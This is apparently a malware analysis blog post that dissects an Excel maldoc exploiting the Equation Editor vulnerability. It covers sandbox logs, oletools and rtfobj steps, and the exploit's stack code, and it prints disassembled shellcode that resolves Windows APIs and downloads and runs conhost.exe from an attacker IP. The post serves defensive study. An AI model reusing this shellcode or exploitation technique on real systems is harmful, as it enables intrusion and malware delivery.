Analysis of Maldoc exploiting Equation Editor
The sample is excel file with extension .xls.
MD5: 4e9da14a7e07654d673f3785cf58e316
SHA256: 57717904ca09bbae18c3370f06e481a95de630e53a9d8aad52bc7695e8d56a77
VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
Table of Contents
Initial Triage
Let’s detonate the sample in a Windows 11 sandbox and check for malicious activities.
Detonating the sample while running noriben.py , we observe the following:
- Process Activity
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf" [Child PID: 5044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf" [Child PID: 5544]
[CreateProcess] svchost.exe:856 > "%ProgramFiles% (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -Embedding" [Child PID: 10280]
[CreateProcess] EQNEDT32.EXE:10280 > "%AppData%\conhost.exe " [Child PID: 7608]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 9772]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 10044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/" [Child PID: 6160]
When the file is executed, it downloads a file from 23.94.206.104 which is processed by Equation editor. It then executes a file named conhost.exe. Then, we see connections to 23[.]94[.]206[.]104.
- File Activity
[CreateFile] EXCEL.EXE:4528 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc [SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542]
[CreateFile] EQNEDT32.EXE:10280 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\conhost[1].exe [SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[CreateFile] EQNEDT32.EXE:10280 > %AppData%\conhost.exe [SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nst3767.tmp
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Sengevders.Pep [SHA256: 4574e94d0f0a27ba498b63b52c1c8be0f1d10dff8b744d3ca85ccbc3a9909846]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Kreture.cla [SHA256: aa29c94affed7df0fb98bf73cf3c80801ba40709d29a10478385eaf449b96bb8]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Krimsk.hai [SHA256: 1d44d77a1338511c764d8dfd61098120c448e08a15cbf0d1891dde76ba815566]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\disquiparation.fng [SHA256: bececeb4b1c87a8a7d2ac196c19b4cd4ad9bbfa62698101b82e0d0c8a763086c]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\endosseredes.txt [SHA256: 7d82d4289f9fedd9d080cd4d1f65a045aa20c022b98dc3840bee141b9b572118]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\eskadronen.ups [SHA256: 7d5604f7815d42a9a432f6836cd7a3c628dd24dbf33995e5dd980a08b69d84e2]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Tagrytteren\Protests\bashfully\zannos.dip [SHA256: 541ddf79e94f50b04efdb22b8dcb3a3c6e7e72db3c91ca75e27d060047a69e14]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk [SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk [SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp\System.dll [SHA256: bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb]`
By examining File Activity, it becomes clear that the file microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc is downloaded. Then conhost.exe is downloaded which then creates various files in the temp directory.
- Network Activity
Running wireshark in background, we can capture network connection made to 23[.]94[.]206[.]104 which shows rtf file and a exe file being downloaded.
Further communication observed :
From observing process, file and network, we see the following steps being taken when xls file is executed:
- Downloads an rtf file from 23[.]94[.]206[.]104
- Equation editor parses the rtf file which triggers the vulnerability.
- It downloads an exe file from 23[.]94[.]206[.]104
- Exe file writes itself to tmp folder and makes connection to 23[.]94[.]206[.]104
- However, its execution is stopped since it detected that it is running in VM.
Digging deeper
Excel File
The excel file can be analyzed using ole tools such as oledump and oledir.
Output from OleDir shows a stream containing suspicious code in it. We can dump it later and examine the code.
From Oletools, it is clear that the excel file is password protected. It doesn’t contain macro code in it. To make the analysis easier, we can use msoffcrypto-crack.py to decrypt the file. In most cases, excel files use VelvetSweatshop as the default password to ensure that the malicious code is executed when opened.
We can use strings to see a clear url :
This string can be seen in Fig 2 which downloads RTF File.
RTF File
RTF file downloaded from 23[.]94[.]206[.]104
MD5: bcf1451b6bb1a36c12a0abf8f4875cd4
SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542
We can see the CSLID of equation editor in RTF File which ensures that the file is processed by equation editor.
Checking with rtfdump tool, an object is clearing shown :
To dump this object, we can use rtfobj tool :
This object would most likely contain a shellcode that is executed once when the vulnerability in Equation Editor is exploited. To find the shellcode, there are certain tricks to find certain patterns however they don’t always work. We can use scdbg to find the shellcode.
It is clear from the output that the shellcode downloads conhost.exe from 23[.]94[.]206[.]104
Shellcode analysis
The output from the scdbg doesn’t give the full picture. We can use x64dbg to dump the shellcode properly.
In order to debug equation editor, we need to create an entry under the registry : Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options with the name as eqnedt32.exe
Once it is created, we can create a key named debugger and set its value to the path of x64dbg executable.
This will ensure that once equation editor is executed, it is spawned under a debugger.
After spending some time, we are able to extract the shellcode.
Exploitation of vulnerability
This exploit has been analyzed thoroughly. One can refer the below blogs for more insights:
- Unit42: https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
- LastLine: https://www.lastline.com/labsblog/evading-static-analyzers-by-solving-the-equation-editor/
- QuickHeal: https://blogs.quickheal.com/obfuscated-equation-editor-exploit-cve-2017-11882-spreading-hawkeye-keylogger/
Equation editor doesn’t have DEP and ASLR so the addresses do not change. While analyzing this sample, the function 0x0041160F
gets invoked twice. Initially the function is called from 0x00411349
and then from 0x004115D3
at which point the exploit is triggered. The function returns to the exploit code written onto the stack as shown below.
The code written onto the stack which jumps to the shellcode :
0019ECB4 | B8 FDBDD749 | mov eax,49D7BDFD |
0019ECB9 | 25 3CBF4526 | and eax,2645BF3C |
0019ECBE | 8B18 | mov ebx,dword ptr ds:[eax] |
0019ECC0 | 8B33 | mov esi,dword ptr ds:[ebx] |
0019ECC2 | BA CEC6F8D4 | mov edx,D4F8C6CE |
0019ECC7 | 81F2 7EA1BED4 | xor edx,D4BEA17E |
0019ECCD | 8B12 | mov edx,dword ptr ds:[edx] |
0019ECCF | 56 | push esi |
0019ECD0 | FFD2 | call edx |
0019ECD2 | 05 3A819EF2 | add eax,F29E813A |
0019ECD7 | 05 557F610D | add eax,D617F55 |
0019ECDC | FFE0 | jmp eax |
The above code gets the starting address of global memory region where the user crafted rtf file is stored. It then calculates the starting point of the shellcode and begins the execution.
The initial routine of the shellcode decrypts the rest of the shellcode and jumps to it which is shown below:
pop eax #contains the starting address of the shellcode
add eax,259
lea ebx, dword ptr ds:[eax+281]
imul ecx,ecx,0
imul ecx,ecx,C231DF5 #loc_a
add ecx,CD5B387
pushfd
push eax
add eax,48A0
lea eax,dword ptr ds:[eax+2795]
sub eax,14F3
lea eax,dword ptr ds:[eax+22A3]
pop eax
popfd
xor dword ptr ds:[eax],ecx
add eax,4
cmp eax,ebx
jb loc_a
sub esp,22C
call 4e31489 # Execution from the decrypted portion
After letting the decrypting routine run, we can dump the shellcode and analyze in ghidra. Data and code is mixed together making it difficult for decompiler. By carefully analyzing it, we can separate the data and code in it.
Cleaned and decrypted shellcode:
LAB_00000464 XREF[2]: 0000038d(j), 0000043c(j)
00000464 39 d8 CMP EAX,EBX
00000466 0f 82 b7 JC LAB_00000323
fe ff ff
0000046c 81 ec 2c SUB ESP,0x22c
02 00 00
00000472 e8 12 00 CALL FUN_00000489 undefined FUN_00000489()
00 00
00000477 6b 00 65 unicode u"kernel32"
00 72 00
6e 00 65
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000489()
FUN_00000489 XREF[1]: 00000472(c)
00000489 e8 7b 01 CALL FUN_00000609 undefined FUN_00000609(undefined
00 00
0000048e 89 c3 MOV EBX,EAX
00000490 e8 0d 00 CALL FUN_000004a2 undefined FUN_000004a2()
00 00
00000495 4c 6f 61 ds "LoadLibraryW"
64 4c 69
62 72 61
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004a2()
FUN_000004a2 XREF[1]: FUN_00000489:00000490(c)
000004a2 53 PUSH EBX
000004a3 e8 da 01 CALL FUN_00000682 undefined FUN_00000682(undefined
00 00
000004a8 89 c7 MOV EDI,EAX
000004aa e8 0f 00 CALL FUN_000004be undefined FUN_000004be()
00 00
000004af 47 65 74 ds "GetProcAddress"
50 72 6f
63 41 64
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004be()
FUN_000004be XREF[1]: FUN_000004a2:000004aa(c)
000004be 53 PUSH EBX
000004bf e8 be 01 CALL FUN_00000682 undefined FUN_00000682(undefined
00 00
000004c4 89 c6 MOV ESI,EAX
000004c6 e8 1a 00 CALL FUN_000004e5 undefined FUN_000004e5()
00 00
000004cb 45 78 70 ds "ExpandEnvironmentStringsW"
61 6e 64
45 6e 76
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000004e5()
FUN_000004e5 XREF[1]: FUN_000004be:000004c6(c)
000004e5 53 PUSH EBX
000004e6 ff d6 CALL ESI
000004e8 68 04 01 PUSH 0x104
00 00
000004ed 8d 54 24 08 LEA EDX,[ESP + 0x8]
000004f1 52 PUSH EDX
000004f2 e8 2c 00 CALL FUN_00000523 undefined FUN_00000523()
00 00
000004f7 25 00 41 unicode u"%APPDATA%\\conhost.exe"
00 50 00
50 00 44
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000523()
FUN_00000523 XREF[1]: FUN_000004e5:000004f2(c)
00000523 ff d0 CALL EAX
00000525 e8 0e 00 CALL FUN_00000538 undefined FUN_00000538()
00 00
0000052a 55 00 72 unicode u"UrlMon"
00 6c 00
4d 00 6f
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000538()
FUN_00000538 XREF[1]: FUN_00000523:00000525(c)
00000538 ff d7 CALL EDI
0000053a e8 13 00 CALL FUN_00000552 undefined FUN_00000552()
00 00
0000053f 55 52 4c ds "URLDownloadToFileW"
44 6f 77
6e 6c 6f
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000552()
FUN_00000552 XREF[1]: FUN_00000538:0000053a(c)
00000552 50 PUSH EAX
00000553 ff d6 CALL ESI
00000555 6a 00 PUSH 0x0
00000557 6a 00 PUSH 0x0
00000559 8d 54 24 0c LEA EDX,[ESP + 0xc]
0000055d 52 PUSH EDX
0000055e e8 4c 00 CALL FUN_000005af undefined FUN_000005af()
00 00
00000563 68 00 74 unicode u"http://23.94.206.104/9080/conhost.exe"
00 74 00
70 00 3a
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005af()
FUN_000005af XREF[1]: FUN_00000552:0000055e(c)
000005af 6a 00 PUSH 0x0
000005b1 ff d0 CALL EAX
000005b3 e8 10 00 CALL FUN_000005c8 undefined FUN_000005c8()
00 00
000005b8 73 00 68 unicode u"shell32"
00 65 00
6c 00 6c
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005c8()
FUN_000005c8 XREF[1]: FUN_000005af:000005b3(c)
000005c8 ff d7 CALL EDI
000005ca e8 0e 00 CALL FUN_000005dd undefined FUN_000005dd()
00 00
000005cf 53 68 65 ds "ShellExecuteW"
6c 6c 45
78 65 63
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_000005dd()
FUN_000005dd XREF[1]: FUN_000005c8:000005ca(c)
000005dd 50 PUSH EAX
000005de ff d6 CALL ESI
000005e0 6a 01 PUSH 0x1
000005e2 6a 00 PUSH 0x0
000005e4 6a 00 PUSH 0x0
000005e6 8d 54 24 10 LEA EDX,[ESP + 0x10]
000005ea 52 PUSH EDX
000005eb 6a 00 PUSH 0x0
000005ed 6a 00 PUSH 0x0
000005ef ff d0 CALL EAX
000005f1 e8 0c 00 CALL FUN_00000602 undefined FUN_00000602()
00 00
000005f6 45 78 69 ds "ExitProcess"
74 50 72
6f 63 65
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000602()
FUN_00000602 XREF[1]: FUN_000005dd:000005f1(c)
00000602 53 PUSH EBX
00000603 ff d6 CALL ESI
00000605 6a 00 PUSH 0x0
00000607 ff d0 CALL EAX
The above part of shellcode when executed performs the same actions shown in Fig 14.
The shellcode also contains 3 further sub-routines that performs API Hashing :
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000609(undefined4 param_1)
undefined4 Stack[0x4]:4 param_1 XREF[1]: 0000061d(R)
FUN_00000609 XREF[1]: FUN_00000489:00000489(c)
00000609 52 PUSH EDX
0000060a 64 8b 15 MOV EDX,dword ptr FS:[0x30]
30 00 00 00
00000611 8b 52 0c MOV EDX,dword ptr [EDX + 0xc]
00000614 83 c2 0c ADD EDX,0xc
LAB_00000617 XREF[1]: 00000628(j)
00000617 8b 12 MOV EDX,dword ptr [EDX]
00000619 8b 4a 30 MOV ECX,dword ptr [EDX + 0x30]
0000061c 51 PUSH ECX
0000061d ff 74 24 0c PUSH dword ptr [ESP + param_1]
00000621 e8 0b 00 CALL FUN_00000631 undefined FUN_00000631(undefined
00 00
00000626 85 c0 TEST EAX,EAX
00000628 74 ed JZ LAB_00000617
0000062a 8b 42 18 MOV EAX,dword ptr [EDX + 0x18]
0000062d 5a POP EDX
0000062e c2 04 00 RET 0x4
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000631(undefined4 param_1, undefined4 pa
undefined4 Stack[0x4]:4 param_1 XREF[1]: 00000632(R)
undefined4 Stack[0x8]:4 param_2 XREF[1]: 00000636(R)
FUN_00000631 XREF[1]: FUN_00000609:00000621(c)
00000631 52 PUSH EDX
00000632 8b 4c 24 08 MOV ECX,dword ptr [ESP + param_1]
00000636 8b 54 24 0c MOV EDX,dword ptr [ESP + param_2]
0000063a 0f b6 01 MOVZX EAX,byte ptr [ECX]
LAB_0000063d XREF[1]: 00000679(j)
0000063d 66 85 c0 TEST AX,AX
00000640 74 39 JZ LAB_0000067b
00000642 66 3b 02 CMP AX,word ptr [EDX]
00000645 74 29 JZ LAB_00000670
00000647 66 83 f8 61 CMP AX,'a'
0000064b 72 06 JC LAB_00000653
0000064d 66 83 f8 7a CMP AX,'z'
00000651 76 0c JBE LAB_0000065f
LAB_00000653 XREF[1]: 0000064b(j)
00000653 66 83 f8 41 CMP AX,'A'
00000657 72 13 JC LAB_0000066c
00000659 66 83 f8 5a CMP AX,'Z'
0000065d 77 0d JA LAB_0000066c
LAB_0000065f XREF[1]: 00000651(j)
0000065f 66 83 f0 20 XOR AX,0x20
00000663 66 3b 02 CMP AX,word ptr [EDX]
00000666 74 02 JZ LAB_0000066a
00000668 eb 02 JMP LAB_0000066c
LAB_0000066a XREF[1]: 00000666(j)
0000066a eb 04 JMP LAB_00000670
LAB_0000066c XREF[3]: 00000657(j), 0000065d(j),
00000668(j)
0000066c 31 c0 XOR EAX,EAX
0000066e eb 0e JMP LAB_0000067e
LAB_00000670 XREF[2]: 00000645(j), 0000066a(j)
00000670 83 c1 02 ADD ECX,0x2
00000673 83 c2 02 ADD EDX,0x2
00000676 0f b6 01 MOVZX EAX,byte ptr [ECX]
00000679 eb c2 JMP LAB_0000063d
LAB_0000067b XREF[1]: 00000640(j)
0000067b 83 c8 01 OR EAX,0x1
LAB_0000067e XREF[1]: 0000066e(j)
0000067e 5a POP EDX
0000067f c2 08 00 RET 0x8
**************************************************************
* FUNCTION *
**************************************************************
undefined FUN_00000682(undefined4 param_1, undefined4 pa
undefined4 Stack[0x4]:4 param_1 XREF[1]: 00000686(R)
undefined4 Stack[0x8]:4 param_2 XREF[1]: 000006ad(R)
FUN_00000682 XREF[2]: FUN_000004a2:000004a3(c),
FUN_000004be:000004bf(c)
00000682 53 PUSH EBX
00000683 52 PUSH EDX
00000684 56 PUSH ESI
00000685 57 PUSH EDI
00000686 8b 54 24 14 MOV EDX,dword ptr [ESP + param_1]
0000068a 8b 42 3c MOV EAX,dword ptr [EDX + 0x3c]
0000068d 8d 44 02 78 LEA EAX,[EDX + EAX*0x1 + 0x78]
00000691 8b 00 MOV EAX,dword ptr [EAX]
00000693 01 d0 ADD EAX,EDX
00000695 50 PUSH EAX
00000696 8b 48 18 MOV ECX,dword ptr [EAX + 0x18]
00000699 8b 58 20 MOV EBX,dword ptr [EAX + 0x20]
0000069c 01 d3 ADD EBX,EDX
0000069e 30 c0 XOR AL,AL
LAB_000006a0 XREF[1]: 000006df(j)
000006a0 85 c9 TEST ECX,ECX
000006a2 74 3d JZ LAB_000006e1
000006a4 51 PUSH ECX
000006a5 8b 0b MOV ECX,dword ptr [EBX]
000006a7 8d 0c 11 LEA ECX,[ECX + EDX*0x1]
000006aa 89 cf MOV EDI,ECX
000006ac 57 PUSH EDI
000006ad 8b 74 24 24 MOV ESI,dword ptr [ESP + param_2]
000006b1 31 c9 XOR ECX,ECX
000006b3 49 DEC ECX
000006b4 f2 ae SCASB.RE ES:EDI
000006b6 f7 d1 NOT ECX
000006b8 5f POP EDI
000006b9 f3 a6 CMPSB.REPE ES:EDI,ESI
000006bb 75 1d JNZ LAB_000006da
000006bd 59 POP ECX
000006be 58 POP EAX
000006bf 2b 48 18 SUB ECX,dword ptr [EAX + 0x18]
000006c2 f7 d9 NEG ECX
000006c4 8b 58 24 MOV EBX,dword ptr [EAX + 0x24]
000006c7 01 d3 ADD EBX,EDX
000006c9 0f b7 1c 4b MOVZX EBX,word ptr [EBX + ECX*0x2]
000006cd 8b 40 1c MOV EAX,dword ptr [EAX + 0x1c]
000006d0 8d 04 98 LEA EAX,[EAX + EBX*0x4]
000006d3 8b 04 10 MOV EAX,dword ptr [EAX + EDX*0x1]
000006d6 01 d0 ADD EAX,EDX
000006d8 eb 0c JMP LAB_000006e6
LAB_000006da XREF[1]: 000006bb(j)
000006da 83 c3 04 ADD EBX,0x4
000006dd 59 POP ECX
000006de 49 DEC ECX
000006df eb bf JMP LAB_000006a0
LAB_000006e1 XREF[1]: 000006a2(j)
000006e1 31 c0 XOR EAX,EAX
000006e3 83 c4 04 ADD ESP,0x4
LAB_000006e6 XREF[1]: 000006d8(j)
000006e6 5f POP EDI
000006e7 5e POP ESI
000006e8 5a POP EDX
000006e9 5b POP EBX
000006ea c2 08 00 RET 0x8
000006ed 6e 3d d4
Once the shellcode is finished executing, it drops the file conhost.exe in tmp folder.
conhost.exe
MD5: 8ae5d58be1f0e18dcf150b83939c0f00
SHA256: 5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b
VT Link: https://www.virustotal.com/gui/file/5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b
A preliminary analysis of the file shows that it is a NSIS-Installer which executes a shellcode. The file appears to be GuLoader malware which deserves its own sepearate blog.